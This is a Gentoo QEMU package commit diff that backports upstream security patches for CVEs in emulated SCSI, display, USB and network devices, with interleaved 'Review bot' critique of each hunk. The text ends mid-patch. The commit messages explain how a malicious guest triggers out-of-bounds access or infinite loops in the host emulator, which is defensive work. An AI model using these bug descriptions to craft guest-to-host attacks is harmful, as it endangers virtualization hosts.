-files/qemu-2.6.0-crypto-static.patch, -files/qemu-2.6.0-glib-size_t.patch:
drop obsolete patches
Package-Manager: portage-2.2.28
05 Sep 2016; Matthias Maier <tamiko@gentoo.org> qemu-2.7.0.ebuild:
fix installation with USE=python, bug #592908
Package-Manager: portage-2.2.28
05 Sep 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.7.0.ebuild:
amd64 stable wrt bug #592430
Package-Manager: portage-2.2.28
RepoMan-Options: --include-arches="amd64"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
05 Sep 2016; Agostino Sarubbo <ago@gentoo.org> qemu-2.7.0.ebuild:
x86 stable wrt bug #592430
Package-Manager: portage-2.2.28
RepoMan-Options: --include-arches="x86"
Signed-off-by: Agostino Sarubbo <ago@gentoo.org>
05 Sep 2016; Matthias Maier <tamiko@gentoo.org>
-files/qemu-2.5.0-CVE-2015-8558.patch,
-files/qemu-2.5.0-CVE-2016-2198.patch,
-files/qemu-2.5.0-rng-stack-corrupt-0.patch,
-files/qemu-2.5.0-rng-stack-corrupt-1.patch,
-files/qemu-2.5.0-rng-stack-corrupt-2.patch,
-files/qemu-2.5.0-rng-stack-corrupt-3.patch,
-files/qemu-2.5.1-CVE-2015-8558.patch,
-files/qemu-2.5.1-CVE-2016-4020.patch,
-files/qemu-2.5.1-stellaris_enet-overflow.patch,
-files/qemu-2.5.1-xfs-linux-headers.patch, -qemu-2.5.1.ebuild:
drop vulnerable 2.5.1, bug #592430, and 19 others
Package-Manager: portage-2.2.28
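Review bot: the commit message ("sync qemu-2.7.0-r7") says nothing about this hunk deleting the package's entire ChangeLog (792 lines, described in its own header as auto-generated from git log); state that explicitly and say where the history now lives, because this file is the only in-tree summary of which security backports each revision carried (the per-CVE patch lists at the 23 Mar 2016 qemu-2.5.0-r2 entry and the 05 Sep 2016 qemu-2.7.0 entry mapping upstream commit hashes to CVE-2016-4001 through CVE-2016-6888, and the 14 Dec 2015 entry whose embedded virtfshell exploit is the recorded rationale for dropping the virtfs-proxy-helper fcaps on 15 Dec 2015). A one-line note in the commit message such as "drop ChangeLog; history is in the upstream gentoo git log" would tell anyone auditing CVE coverage of this overlay that the record was moved, not lost.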


@ -3,10 +3,37 @@ AUX bridge.conf 454 SHA256 a51850dd39923f3482e4c575b48ad9fef9c9ebb2f2176225da399
AUX qemu-2.5.0-cflags.patch 410 SHA256 17f5624dd733f5c80e733cc67ae36a736169ec066024dbf802b416accfed0755 SHA512 0194d28de08b4e51c5bd1c9a2cc7965ba7f66dfddb8fd91de3da93677e6cf2d38ad3270f69aaea8a20cf2533c2980018d6e0fed711be2806fe2053fba7c081f3 WHIRLPOOL 5f5b95d00409fbe03adb64801d30a2fb5f98dded5efa7f0e78b5746776f72917dcbea767e1d0afcb304d8bf8c484adedb8037e6d54e9d34997c2bc3a98b53154 AUX qemu-2.5.0-cflags.patch 410 SHA256 17f5624dd733f5c80e733cc67ae36a736169ec066024dbf802b416accfed0755 SHA512 0194d28de08b4e51c5bd1c9a2cc7965ba7f66dfddb8fd91de3da93677e6cf2d38ad3270f69aaea8a20cf2533c2980018d6e0fed711be2806fe2053fba7c081f3 WHIRLPOOL 5f5b95d00409fbe03adb64801d30a2fb5f98dded5efa7f0e78b5746776f72917dcbea767e1d0afcb304d8bf8c484adedb8037e6d54e9d34997c2bc3a98b53154
AUX qemu-2.5.0-sysmacros.patch 333 SHA256 a5716fc02da383d455f5cbd76f49e4ee74d84c2d5703319adcbeb145d04875f9 SHA512 329632c5bff846ca3ffcdb4bc94ae62f17c6bdbb566f9bec0784357c943523e8ca7773790b83a9617734cab3b003baa3d636cbd08f7385810a63b0fa0383c4f0 WHIRLPOOL 2a774767d4685545d3ed18e4f5dece99a9007597d73c56197652ff24083550f987ffb69e5c624760dece87def71a7c5c22a694bf999d7309e48ef622f18f0d73 AUX qemu-2.5.0-sysmacros.patch 333 SHA256 a5716fc02da383d455f5cbd76f49e4ee74d84c2d5703319adcbeb145d04875f9 SHA512 329632c5bff846ca3ffcdb4bc94ae62f17c6bdbb566f9bec0784357c943523e8ca7773790b83a9617734cab3b003baa3d636cbd08f7385810a63b0fa0383c4f0 WHIRLPOOL 2a774767d4685545d3ed18e4f5dece99a9007597d73c56197652ff24083550f987ffb69e5c624760dece87def71a7c5c22a694bf999d7309e48ef622f18f0d73
AUX qemu-2.7.0-CVE-2016-6836.patch 889 SHA256 a94812131e8baa66b81971579ab84b20bf15d544e2698448a5247ac0ddca0b3d SHA512 cf7f327f26aee5b6688eb662ced8aa07775ad9558b4a02db244303f6b7d37be9cd19b18d5725819b4708184105b98830864e0ad3af81373e59e880809036345b WHIRLPOOL df00627ad447162fdcac4b2c965a8cb5c916a7fb66d8c3a4f8f48bb2d869d7805cb3308cd495ff74ebf4840e7bc2d85abf8e666d78b3da9abb4e2bae22697a82 AUX qemu-2.7.0-CVE-2016-6836.patch 889 SHA256 a94812131e8baa66b81971579ab84b20bf15d544e2698448a5247ac0ddca0b3d SHA512 cf7f327f26aee5b6688eb662ced8aa07775ad9558b4a02db244303f6b7d37be9cd19b18d5725819b4708184105b98830864e0ad3af81373e59e880809036345b WHIRLPOOL df00627ad447162fdcac4b2c965a8cb5c916a7fb66d8c3a4f8f48bb2d869d7805cb3308cd495ff74ebf4840e7bc2d85abf8e666d78b3da9abb4e2bae22697a82
AUX qemu-2.7.0-CVE-2016-7155.patch 2745 SHA256 addf638a53bfae8556e463e0b78a151eef0fdf171eb395a98dbdf0332ff74131 SHA512 96e9df733c5227899da7d2ecc346139df9830dd16fc16f1f14666f8be60205a43f434fd79e158c2000926656ffa137809f1cb3c57a04cb375011f816e92e2f4b WHIRLPOOL c04c0dda417a70e4acb289c6b296da93f3eb8e51f7cfad62351b7235512e04714fdc169a87f4cbf1ef82bfc6decc8ebb5b3958f23d001795c9ebcd08369185a3
AUX qemu-2.7.0-CVE-2016-7156.patch 2314 SHA256 7fa0d7f1025a3435b692a6e7ed8fa3be38a918395a8253e8c27f416ff37e041d SHA512 db3009fdf6d85ffd24fd4a2a40b372b0e665274bba1ce01632aef0d583f2830b58f889166a34acd36409944ab3f7e264801bf89a78f55a586b5f43429a1c86dc WHIRLPOOL ce8101b7607612ed7b9c6fbe373f9b5dec07e0ea8af0b4be8e52b4add5dd0ba12c9e5eb7380d68e3d3867988e0cfc1bdd1e8357ce2b71ef19f51e316fac62161


@ -0,0 +1,81 @@
From: Prasad J Pandit <address@hidden>
Vmware Paravirtual SCSI emulation uses command descriptors to
process SCSI commands. These descriptors come with their ring
buffers. A guest could set the page count for these rings to
an arbitrary value, leading to an infinite loop or OOB access.
Add a check to avoid it.
Reported-by: Tom Victor <address@hidden>
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/scsi/vmw_pvscsi.c | 21 ++++++++++-----------
1 file changed, 10 insertions(+), 11 deletions(-)
Update per review
-> https://lists.gnu.org/archive/html/qemu-devel/2016-09/msg00019.html
diff --git a/hw/scsi/vmw_pvscsi.c b/hw/scsi/vmw_pvscsi.c
index 5116f4a..4245c15 100644
--- a/hw/scsi/vmw_pvscsi.c
+++ b/hw/scsi/vmw_pvscsi.c
@@ -152,7 +152,7 @@ pvscsi_log2(uint32_t input)
return log;
}
-static int
+static void
pvscsi_ring_init_data(PVSCSIRingInfo *m, PVSCSICmdDescSetupRings *ri)
{
int i;
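Review bot: the change from `static int` to `static void` on pvscsi_ring_init_data only holds up if every caller stops inspecting the result; the later hunk in pvscsi_on_cmd_setup_rings drops its `< 0` test, so please confirm that is the sole call site.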
@@ -160,10 +160,6 @@ pvscsi_ring_init_data(PVSCSIRingInfo *m, PVSCSICmdDescSetupRings *ri)
uint32_t req_ring_size, cmp_ring_size;
m->rs_pa = ri->ringsStatePPN << VMW_PAGE_SHIFT;
- if ((ri->reqRingNumPages > PVSCSI_SETUP_RINGS_MAX_NUM_PAGES)
- || (ri->cmpRingNumPages > PVSCSI_SETUP_RINGS_MAX_NUM_PAGES)) {
- return -1;
- }
req_ring_size = ri->reqRingNumPages * PVSCSI_MAX_NUM_REQ_ENTRIES_PER_PAGE;
cmp_ring_size = ri->cmpRingNumPages * PVSCSI_MAX_NUM_CMP_ENTRIES_PER_PAGE;
txr_len_log2 = pvscsi_log2(req_ring_size - 1);
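Review bot: the removed bounds check only rejected page counts above PVSCSI_SETUP_RINGS_MAX_NUM_PAGES, never zero, yet the lines that follow compute `txr_len_log2 = pvscsi_log2(req_ring_size - 1);`, where a zero reqRingNumPages makes req_ring_size 0 and the argument wrap to 0xffffffff; the replacement check in pvscsi_on_cmd_setup_rings covers that case with `!rc->reqRingNumPages`, which is why it has to run before this function is called.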
@@ -195,8 +191,6 @@ pvscsi_ring_init_data(PVSCSIRingInfo *m, PVSCSICmdDescSetupRings *ri)
/* Flush ring state page changes */
smp_wmb();
-
- return 0;
}
static int
@@ -746,7 +740,7 @@ pvscsi_dbg_dump_tx_rings_config(PVSCSICmdDescSetupRings *rc)
trace_pvscsi_tx_rings_num_pages("Confirm Ring", rc->cmpRingNumPages);
for (i = 0; i < rc->cmpRingNumPages; i++) {
- trace_pvscsi_tx_rings_ppn("Confirm Ring", rc->reqRingPPNs[i]);
+ trace_pvscsi_tx_rings_ppn("Confirm Ring", rc->cmpRingPPNs[i]);
}
}
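Review bot: the trace fix from `rc->reqRingPPNs[i]` to `rc->cmpRingPPNs[i]` is a separate correctness bug (the confirm-ring loop was indexing the request-ring PPN array with the confirm-ring page count) and would be clearer as its own commit; since the loop bound is the guest-supplied cmpRingNumPages, it matters that this dump now runs only after the page-count check added in the next hunk.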
@@ -779,10 +773,15 @@ pvscsi_on_cmd_setup_rings(PVSCSIState *s)
trace_pvscsi_on_cmd_arrived("PVSCSI_CMD_SETUP_RINGS");
+ if (!rc->reqRingNumPages
+ || rc->reqRingNumPages > PVSCSI_SETUP_RINGS_MAX_NUM_PAGES
+ || !rc->cmpRingNumPages
+ || rc->cmpRingNumPages > PVSCSI_SETUP_RINGS_MAX_NUM_PAGES) {
+ return PVSCSI_COMMAND_PROCESSING_FAILED;
+ }
+
pvscsi_dbg_dump_tx_rings_config(rc);
- if (pvscsi_ring_init_data(&s->rings, rc) < 0) {
- return PVSCSI_COMMAND_PROCESSING_FAILED;
- }
+ pvscsi_ring_init_data(&s->rings, rc);
s->rings_info_valid = TRUE;
return PVSCSI_COMMAND_PROCESSING_SUCCEEDED;
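Review bot: returning PVSCSI_COMMAND_PROCESSING_FAILED silently leaves an operator with no record of a guest that sent an out-of-range or zero ring page count; a qemu_log_mask(LOG_GUEST_ERROR, ...) before the return would make such attempts visible in the host log, and a one-line comment stating that both counts must lie in 1..PVSCSI_SETUP_RINGS_MAX_NUM_PAGES would document the invariant pvscsi_ring_init_data now relies on.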
--
2.5.5


@ -0,0 +1,62 @@
From: Prasad J Pandit <address@hidden>
In PVSCSI paravirtual SCSI bus, pvscsi_convert_sglist can take a very
long time or go into an infinite loop due to two different bugs:
1) the request descriptor data length is defined to be 64 bit. While
building SG list from a request descriptor, it gets truncated to 32bit
in routine 'pvscsi_convert_sglist'. This could lead to an infinite loop
situation for large 'dataLen' values, when data_length is cast to uint32_t
and chunk_size becomes always zero. Fix this by removing the incorrect
cast.
2) pvscsi_get_next_sg_elem can be called arbitrarily many times if the
element has a zero length. Get out of the loop early when this happens,
by introducing an upper limit on the number of SG list elements.
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/scsi/vmw_pvscsi.c | 11 ++++++-----
1 file changed, 6 insertions(+), 5 deletions(-)
Update as per:
-> https://lists.gnu.org/archive/html/qemu-devel/2016-09/msg01172.html
diff --git a/hw/scsi/vmw_pvscsi.c b/hw/scsi/vmw_pvscsi.c
index 4245c15..babac5a 100644
--- a/hw/scsi/vmw_pvscsi.c
+++ b/hw/scsi/vmw_pvscsi.c
@@ -40,6 +40,8 @@
#define PVSCSI_MAX_DEVS (64)
#define PVSCSI_MSIX_NUM_VECTORS (1)
+#define PVSCSI_MAX_SG_ELEM 2048
+
#define PVSCSI_MAX_CMD_DATA_WORDS \
(sizeof(PVSCSICmdDescSetupRings)/sizeof(uint32_t))
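Review bot: `#define PVSCSI_MAX_SG_ELEM 2048` needs a comment giving the rationale for the value; the commit message only says an upper limit is introduced, and a reader cannot tell whether 2048 is a spec limit, a sizing derived from the ring, or an arbitrary cap that a legitimate guest could hit with a large, fragmented request.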
@@ -628,17 +630,16 @@ pvscsi_queue_pending_descriptor(PVSCSIState *s, SCSIDevice **d,
static void
pvscsi_convert_sglist(PVSCSIRequest *r)
{
- int chunk_size;
+ uint32_t chunk_size, elmcnt = 0;
uint64_t data_length = r->req.dataLen;
PVSCSISGState sg = r->sg;
- while (data_length) {
- while (!sg.resid) {
+ while (data_length && elmcnt < PVSCSI_MAX_SG_ELEM) {
+ while (!sg.resid && elmcnt++ < PVSCSI_MAX_SG_ELEM) {
pvscsi_get_next_sg_elem(&sg);
trace_pvscsi_convert_sglist(r->req.context, r->sg.dataAddr,
r->sg.resid);
}
- assert(data_length > 0);
- chunk_size = MIN((unsigned) data_length, sg.resid);
+ chunk_size = MIN(data_length, sg.resid);
if (chunk_size) {
qemu_sglist_add(&r->sgl, sg.dataAddr, chunk_size);
}
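Review bot: when the element cap trips, the loop just stops and the request proceeds with a shorter sglist than dataLen describes, with nothing logged; a qemu_log_mask(LOG_GUEST_ERROR, ...) on that exit would help tell a hostile guest from a broken driver. The change from `chunk_size = MIN((unsigned) data_length, sg.resid);` to `chunk_size = MIN(data_length, sg.resid);` with a `uint32_t chunk_size` is safe only because the result is bounded by sg.resid, so it relies on sg.resid being 32-bit; dropping `assert(data_length > 0);` is fine since the outer `while (data_length && ...)` already guarantees it.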
--
2.5.5


@ -0,0 +1,28 @@
From: Prasad J Pandit <address@hidden>
When LSI SAS1068 Host Bus emulator builds configuration page
headers, the format string used in 'mptsas_config_manufacturing_1'
was wrong. It could lead to an invalid memory access.
Reported-by: Tom Victor <address@hidden>
Fix-suggested-by: Paolo Bonzini <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/scsi/mptconfig.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/scsi/mptconfig.c b/hw/scsi/mptconfig.c
index 7071854..1ec895b 100644
--- a/hw/scsi/mptconfig.c
+++ b/hw/scsi/mptconfig.c
@@ -203,7 +203,7 @@ size_t mptsas_config_manufacturing_1(MPTSASState *s, uint8_t **data, int address
{
/* VPD - all zeros */
return MPTSAS_CONFIG_PACK(1, MPI_CONFIG_PAGETYPE_MANUFACTURING, 0x00,
- "s256");
+ "*s256");
}
static
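Review bot: the one-character change from `"s256"` to `"*s256"` carries the whole fix, but nothing here explains what `*` means to the format grammar of mptsas_config_pack; a brief comment at the call site, or a pointer to the format description in mptsas_config_pack, would stop the next reader from simplifying it back. It is also worth checking the other mptsas_config_* page builders for the same pattern rather than fixing only the page that was reported.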
--
2.5.5


@ -0,0 +1,27 @@
From: Prasad J Pandit <address@hidden>
When LSI SAS1068 Host Bus emulator builds configuration page
headers, mptsas_config_pack() asserts to check returned size
value is within limit of 256 bytes. Fix that assert expression.
Suggested-by: Paolo Bonzini <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/scsi/mptconfig.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/scsi/mptconfig.c b/hw/scsi/mptconfig.c
index 1ec895b..531947f 100644
--- a/hw/scsi/mptconfig.c
+++ b/hw/scsi/mptconfig.c
@@ -158,7 +158,7 @@ static size_t mptsas_config_pack(uint8_t **data, const char *fmt, ...)
va_end(ap);
if (data) {
- assert(ret < 256 && (ret % 4) == 0);
+ assert(ret / 4 < 256);
stb_p(*data + 1, ret / 4);
}
return ret;
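Review bot: `assert(ret / 4 < 256)` fixes the bound (the byte written by `stb_p(*data + 1, ret / 4)` holds the length in dwords, so the old `ret < 256` was far too tight) but it also drops the `(ret % 4) == 0` alignment term; if a format string ever produces a size that is not a multiple of four, the stored header length is silently rounded down and the page is truncated for the guest. Unless every format used is guaranteed dword-aligned, keep both conditions: `assert(ret / 4 < 256 && (ret % 4) == 0);`.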
--
2.5.5


@ -0,0 +1,40 @@
From: Prasad J Pandit <address@hidden>
When processing svga command DEFINE_CURSOR in vmsvga_fifo_run,
the computed BITMAP and PIXMAP size are checked against the
'cursor.mask[]' and 'cursor.image[]' array sizes in bytes.
Correct these checks to avoid OOB memory access.
Reported-by: Qinghao Tang <address@hidden>
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/display/vmware_vga.c | 12 +++++++-----
1 file changed, 7 insertions(+), 5 deletions(-)
diff --git a/hw/display/vmware_vga.c b/hw/display/vmware_vga.c
index e51a05e..6599cf0 100644
--- a/hw/display/vmware_vga.c
+++ b/hw/display/vmware_vga.c
@@ -676,11 +676,13 @@ static void vmsvga_fifo_run(struct vmsvga_state_s *s)
cursor.bpp = vmsvga_fifo_read(s);
args = SVGA_BITMAP_SIZE(x, y) + SVGA_PIXMAP_SIZE(x, y, cursor.bpp);
- if (cursor.width > 256 ||
- cursor.height > 256 ||
- cursor.bpp > 32 ||
- SVGA_BITMAP_SIZE(x, y) > sizeof cursor.mask ||
- SVGA_PIXMAP_SIZE(x, y, cursor.bpp) > sizeof cursor.image) {
+ if (cursor.width > 256
+ || cursor.height > 256
+ || cursor.bpp > 32
+ || SVGA_BITMAP_SIZE(x, y)
+ > sizeof(cursor.mask) / sizeof(cursor.mask[0])
+ || SVGA_PIXMAP_SIZE(x, y, cursor.bpp)
+ > sizeof(cursor.image) / sizeof(cursor.image[0])) {
goto badcmd;
}
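Review bot: the new comparison against `sizeof(cursor.mask) / sizeof(cursor.mask[0])` is correct only if SVGA_BITMAP_SIZE and SVGA_PIXMAP_SIZE return element counts in the same unit as the array element type, which is what the commit message asserts; a comment on those two lines saying the macros return word counts, not bytes, would keep someone from reintroducing the byte-size comparison. If the tree has an ARRAY_SIZE() macro, using it here would also make the intent self-evident.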
--
2.5.5


@ -0,0 +1,34 @@
From: Prasad J Pandit <address@hidden>
Vmware Paravirtual SCSI emulator while processing IO requests
could run into an infinite loop if 'pvscsi_ring_pop_req_descr'
always returned positive value. Limit IO loop to the ring size.
Cc: address@hidden
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
Message-Id: <address@hidden>
Signed-off-by: Paolo Bonzini <address@hidden>
---
hw/scsi/vmw_pvscsi.c | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/hw/scsi/vmw_pvscsi.c b/hw/scsi/vmw_pvscsi.c
index babac5a..a5ce7de 100644
--- a/hw/scsi/vmw_pvscsi.c
+++ b/hw/scsi/vmw_pvscsi.c
@@ -247,8 +247,11 @@ static hwaddr
pvscsi_ring_pop_req_descr(PVSCSIRingInfo *mgr)
{
uint32_t ready_ptr = RS_GET_FIELD(mgr, reqProdIdx);
+ uint32_t ring_size = PVSCSI_MAX_NUM_PAGES_REQ_RING
+ * PVSCSI_MAX_NUM_REQ_ENTRIES_PER_PAGE;
- if (ready_ptr != mgr->consumed_ptr) {
+ if (ready_ptr != mgr->consumed_ptr
+ && ready_ptr - mgr->consumed_ptr < ring_size) {
uint32_t next_ready_ptr =
mgr->consumed_ptr++ & mgr->txr_len_mask;
uint32_t next_ready_page =
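Review bot: `ring_size` is the architectural maximum (PVSCSI_MAX_NUM_PAGES_REQ_RING times entries per page), not the ring actually configured for this device, so a guest can still drive the loop for up to the maximum number of entries when a smaller ring was set up; bounding with the configured length (`mgr->txr_len_mask + 1`, given the mask applied on the next line) would be tighter. The unsigned subtraction `ready_ptr - mgr->consumed_ptr` handles 32-bit wrap of the producer index correctly, which deserves a comment so a later signed rewrite does not break it.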
--
1.8.3.1


@ -0,0 +1,38 @@
From: Prasad J Pandit <address@hidden>
virtio back end uses a set of buffers to facilitate I/O operations.
If its size is too large, 'cpu_physical_memory_map' could return
a null address. This would result in a null dereference
while un-mapping descriptors. Add check to avoid it.
Reported-by: Qinghao Tang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/virtio/virtio.c | 10 ++++++----
1 file changed, 6 insertions(+), 4 deletions(-)
diff --git a/hw/virtio/virtio.c b/hw/virtio/virtio.c
index 15ee3a7..0a4c5b6 100644
--- a/hw/virtio/virtio.c
+++ b/hw/virtio/virtio.c
@@ -472,12 +472,14 @@ static void virtqueue_map_desc(unsigned int *p_num_sg, hwaddr *addr, struct iove
}
iov[num_sg].iov_base = cpu_physical_memory_map(pa, &len, is_write);
- iov[num_sg].iov_len = len;
- addr[num_sg] = pa;
+ if (iov[num_sg].iov_base) {
+ iov[num_sg].iov_len = len;
+ addr[num_sg] = pa;
+ pa += len;
+ num_sg++;
+ }
sz -= len;
- pa += len;
- num_sg++;
}
*p_num_sg = num_sg;
}
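Review bot: on a failed map the hunk skips the segment and keeps going instead of failing the request; `sz -= len;` still executes with whatever len cpu_physical_memory_map left behind, so if the failed call leaves len at zero the loop makes no progress, and if it reduced len the remaining bytes of the descriptor are quietly dropped while the caller only sees a smaller num_sg with no error. Treating a NULL return as a fatal descriptor error (abandon the element and report it) would be both safer and easier to spot from the host side.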
--
2.5.5


@ -0,0 +1,31 @@
From: Li Qiang <address@hidden>
When processing IO request in mptsas, it uses g_new to allocate
a 'req' object. If an error occurs before 'req->sreq' is
allocated, it could lead to an OOB write in mptsas_free_request
function. Use g_new0 to avoid it.
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
Message-Id: <address@hidden>
Cc: address@hidden
Signed-off-by: Paolo Bonzini <address@hidden>
---
hw/scsi/mptsas.c | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/hw/scsi/mptsas.c b/hw/scsi/mptsas.c
index 0e0a22f..eaae1bb 100644
--- a/hw/scsi/mptsas.c
+++ b/hw/scsi/mptsas.c
@@ -304,7 +304,7 @@ static int mptsas_process_scsi_io_request(MPTSASState *s,
goto bad;
}
- req = g_new(MPTSASRequest, 1);
+ req = g_new0(MPTSASRequest, 1);
QTAILQ_INSERT_TAIL(&s->pending, req, next);
req->scsi_io = *scsi_io;
req->dev = s;
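Review bot: `g_new0` zeroes `req->sreq` so mptsas_free_request can test it on the `goto bad` path, which resolves the reported OOB write, but it papers over the underlying ordering issue that the error path frees a partially initialised request; a comment on this line saying the free routine depends on the zero fill would keep a future change from reverting to g_new for speed.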
--
1.8.3.1


@ -0,0 +1,26 @@
From: Li Qiang <address@hidden>
If the xhci uses msix, it doesn't free the corresponding
memory, thus leading to a memory leak. This patch avoids this.
Signed-off-by: Li Qiang <address@hidden>
---
hw/usb/hcd-xhci.c | 3 +--
1 file changed, 1 insertion(+), 2 deletions(-)
diff --git a/hw/usb/hcd-xhci.c b/hw/usb/hcd-xhci.c
index 188f954..281a2a5 100644
--- a/hw/usb/hcd-xhci.c
+++ b/hw/usb/hcd-xhci.c
@@ -3709,8 +3709,7 @@ static void usb_xhci_exit(PCIDevice *dev)
/* destroy msix memory region */
if (dev->msix_table && dev->msix_pba
&& dev->msix_entry_used) {
- memory_region_del_subregion(&xhci->mem, &dev->msix_table_mmio);
- memory_region_del_subregion(&xhci->mem, &dev->msix_pba_mmio);
+ msix_uninit(dev, &xhci->mem, &xhci->mem);
}
usb_bus_release(&xhci->bus);
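Review bot: the replacement `msix_uninit(dev, &xhci->mem, &xhci->mem)` passes the same container for table and PBA, which matches the two deleted memory_region_del_subregion calls, so the leak fix looks right; if msix_uninit already returns early for a device without MSI-X, the surrounding `if (dev->msix_table && dev->msix_pba && dev->msix_entry_used)` guard is now redundant and could go, though keeping it is harmless.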
--
1.8.3.1


@ -0,0 +1,45 @@
From: Prasad J Pandit <address@hidden>
i.MX Fast Ethernet Controller uses buffer descriptors to manage
data flow to/fro receive & transmit queues. While transmitting
packets, it could continue to read buffer descriptors if a buffer
descriptor has length of zero and has crafted values in bd.flags.
Set an upper limit on the number of buffer descriptors.
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/net/imx_fec.c | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
Update per
-> https://lists.gnu.org/archive/html/qemu-devel/2016-09/msg05284.html
diff --git a/hw/net/imx_fec.c b/hw/net/imx_fec.c
index 1c415ab..1d74827 100644
--- a/hw/net/imx_fec.c
+++ b/hw/net/imx_fec.c
@@ -220,6 +220,8 @@ static const VMStateDescription vmstate_imx_eth = {
#define PHY_INT_PARFAULT (1 << 2)
#define PHY_INT_AUTONEG_PAGE (1 << 1)
+#define IMX_MAX_DESC 1024
+
static void imx_eth_update(IMXFECState *s);
/*
@@ -402,12 +404,12 @@ static void imx_eth_update(IMXFECState *s)
static void imx_fec_do_tx(IMXFECState *s)
{
- int frame_size = 0;
+ int frame_size = 0, descnt = 0;
uint8_t frame[ENET_MAX_FRAME_SIZE];
uint8_t *ptr = frame;
uint32_t addr = s->tx_descriptor;
- while (1) {
+ while (descnt++ < IMX_MAX_DESC) {
IMXFECBufDesc bd;
int len;
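Review bot: `while (descnt++ < IMX_MAX_DESC)` terminates the walk, but nothing in the hunk tells the guest or the host log that transmission was abandoned after 1024 descriptors; a qemu_log_mask(LOG_GUEST_ERROR, ...) after the loop would distinguish a malicious descriptor chain from a driver bug. A comment on IMX_MAX_DESC relating 1024 to the longest legitimate chain for an ENET_MAX_FRAME_SIZE frame would also help, since the same value appears as FEC_MAX_DESC in the mcf_fec change on this page.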


@ -0,0 +1,52 @@
From 070c4b92b8cd5390889716677a0b92444d6e087a Mon Sep 17 00:00:00 2001
From: Prasad J Pandit <pjp@fedoraproject.org>
Date: Thu, 22 Sep 2016 16:02:37 +0530
Subject: [PATCH] net: mcf: limit buffer descriptor count
ColdFire Fast Ethernet Controller uses buffer descriptors to manage
data flow to/fro receive & transmit queues. While transmitting
packets, it could continue to read buffer descriptors if a buffer
descriptor has length of zero and has crafted values in bd.flags.
Set an upper limit on the number of buffer descriptors.
Reported-by: Li Qiang <liqiang6-s@360.cn>
Signed-off-by: Prasad J Pandit <pjp@fedoraproject.org>
Reviewed-by: Paolo Bonzini <pbonzini@redhat.com>
Signed-off-by: Jason Wang <jasowang@redhat.com>
---
hw/net/mcf_fec.c | 5 +++--
1 files changed, 3 insertions(+), 2 deletions(-)
diff --git a/hw/net/mcf_fec.c b/hw/net/mcf_fec.c
index 0ee8ad9..d31fea1 100644
--- a/hw/net/mcf_fec.c
+++ b/hw/net/mcf_fec.c
@@ -23,6 +23,7 @@ do { printf("mcf_fec: " fmt , ## __VA_ARGS__); } while (0)
#define DPRINTF(fmt, ...) do {} while(0)
#endif
+#define FEC_MAX_DESC 1024
#define FEC_MAX_FRAME_SIZE 2032
typedef struct {
@@ -149,7 +150,7 @@ static void mcf_fec_do_tx(mcf_fec_state *s)
uint32_t addr;
mcf_fec_bd bd;
int frame_size;
- int len;
+ int len, descnt = 0;
uint8_t frame[FEC_MAX_FRAME_SIZE];
uint8_t *ptr;
@@ -157,7 +158,7 @@ static void mcf_fec_do_tx(mcf_fec_state *s)
ptr = frame;
frame_size = 0;
addr = s->tx_descriptor;
- while (1) {
+ while (descnt++ < FEC_MAX_DESC) {
mcf_fec_read_bd(&bd, addr);
DPRINTF("tx_bd %x flags %04x len %d data %08x\n",
addr, bd.flags, bd.length, bd.data);
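Review bot: as in the i.MX change, `while (descnt++ < FEC_MAX_DESC)` stops the descriptor walk silently; with frame_size and ptr still pointing into a half-assembled frame, it is worth checking that the code after the loop does not emit the partial frame, and a qemu_log_mask(LOG_GUEST_ERROR, ...) would record the event for the operator. Both drivers cap at 1024 under different names; a shared rationale comment would prevent the two constants drifting apart.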
--
1.7.0.4


@ -0,0 +1,32 @@
From: Prasad J Pandit <address@hidden>
The AMD PC-Net II emulator has a set of control and status (CSR)
registers. Of these, CSR76 and CSR78 hold receive and transmit
descriptor ring length respectively. This ring length could range
from 1 to 65535. Setting ring length to zero leads to an infinite
loop in pcnet_rdra_addr. Add check to avoid it.
Reported-by: Li Qiang <address@hidden>
Signed-off-by: Prasad J Pandit <address@hidden>
---
hw/net/pcnet.c | 3 +++
1 file changed, 3 insertions(+)
diff --git a/hw/net/pcnet.c b/hw/net/pcnet.c
index 198a01f..3078de8 100644
--- a/hw/net/pcnet.c
+++ b/hw/net/pcnet.c
@@ -1429,8 +1429,11 @@ static void pcnet_csr_writew(PCNetState *s, uint32_t rap, uint32_t new_value)
case 47: /* POLLINT */
case 72:
case 74:
+ break;
case 76: /* RCVRL */
case 78: /* XMTRL */
+ val = (val > 0) ? val : 512;
+ break;
case 112:
if (CSR_STOP(s) || CSR_SPND(s))
break;
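Review bot: the added `break;` after `case 74:` and the one after the new ring-length line change behaviour beyond the described fix: previously cases 47, 72, 74, 76 and 78 fell through into case 112's `if (CSR_STOP(s) || CSR_SPND(s)) break;`, and with the breaks they now bypass that check entirely. If that is intended it should be stated in the commit message; otherwise the zero check can be added without altering the fall-through. Substituting `val = (val > 0) ? val : 512;` also replaces an invalid length with a default silently, which hides the guest error from the host log; a qemu_log_mask(LOG_GUEST_ERROR, ...) on that path would make it observable.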
--
2.5.5


@ -0,0 +1,25 @@
From: Li Qiang <address@hidden>
In virtio gpu resource create dispatch, if the pixman format is zero
it doesn't free the resource object allocated previously, thus leading
to a host memory leak issue. This patch avoids this.
Signed-off-by: Li Qiang <address@hidden>
---
hw/display/virtio-gpu.c | 1 +
1 file changed, 1 insertion(+)
diff --git a/hw/display/virtio-gpu.c b/hw/display/virtio-gpu.c
index 7fe6ed8..5b6d17b 100644
--- a/hw/display/virtio-gpu.c
+++ b/hw/display/virtio-gpu.c
